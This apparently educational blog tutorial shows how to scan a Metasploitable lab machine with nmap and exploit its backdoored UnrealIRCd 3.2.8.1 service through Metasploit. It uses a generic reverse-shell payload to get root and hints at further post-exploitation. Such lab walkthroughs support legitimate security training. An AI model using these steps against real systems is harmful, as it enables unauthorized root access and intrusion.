Open a Terminal window on your Backtrack system and type:
nmap -v -A 192.168.12.20 (metasploitable’s IP address)
This will show us the open ports and try to enumerate what services are running. Here is a look at the ports:
Holy open ports Batman!
Nmap will churn for a while while it tries to detect the actual services running on these ports. In a few minutes you will see a screen that looks like this:
For each port, we see the port number, service type and even an attempt at the service software version.
From here, we can grab the software version, in this case “Unreal IRC 3.2.8.1″, and do a search for vulnerabilities for that software release. Just searching “unreal3.2.8.1 exploits” in Google should do the trick.
With a little searching, you can find an Unreal exploit usable through Backtrack 5′s Metasploit program that will give you a root shell. See if you can find it and give it a shot. If you strike out, no worries, we will take a closer look at this in a later tutorial.
If nothing comes up, you may not have the exact software version. Nmap tries its best, but it is not always correct. Backtrack 5′s Metasploit console has several service scanners that we can use to get exact version levels.
So whats next
Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!
First a quick Google search for “Unreal3.2.8.1 exploit” returns this:
Cute, this version of UnrealIRCD had a backdoor added to it. Well I think this is definitely worth trying, especially as it has an “Excellent” Metasploit rank, which basically means the exploit is very stable and works consistently.
The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:
As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.
Excellent!
So, let’s “use” it and check the options:
All it needs is the remote host address:
set RHOST 192.168.12.20 (Metasploitable’s IP address)
Don’t forget to choose a payload for the exploit:
This command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shell’s. A Meterpreter shell would be better than a command shell, and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell with the target when the exploit is finished.
set PAYLOAD generic/shell_reverse_tcp
For this payload all we need to do is set the LHOST command (the IP of our Backtrack Metasploit system) and then do a final “show options” to make sure everything is set okay:
Our RHOST (target) and LHOST (Attacker system that the shell will connect to) values are correctly set.
We are golden, now just type “exploit”:
Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine. As you can see above, I typed “whoami” and the target system responded with “root”. The “Root” user is the highest level user that you can be on a Linux machine! It worked!
So to re-cap, we found an open service on the target machine. Searched for and found an exploit that works on the software version present. And finally, used the exploit and obtained a full remote shell.
All the standard Linux commands work with our shell that we have. But if you poke around a little bit, you will find that you are in the /etc/unreal directory (use the “pwd” command). And it will not allow you out of this directory. Odd, but don’t forget that we are the Root user! We can make new users, or do almost anything else that we want.
In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.
No comments:
Post a Comment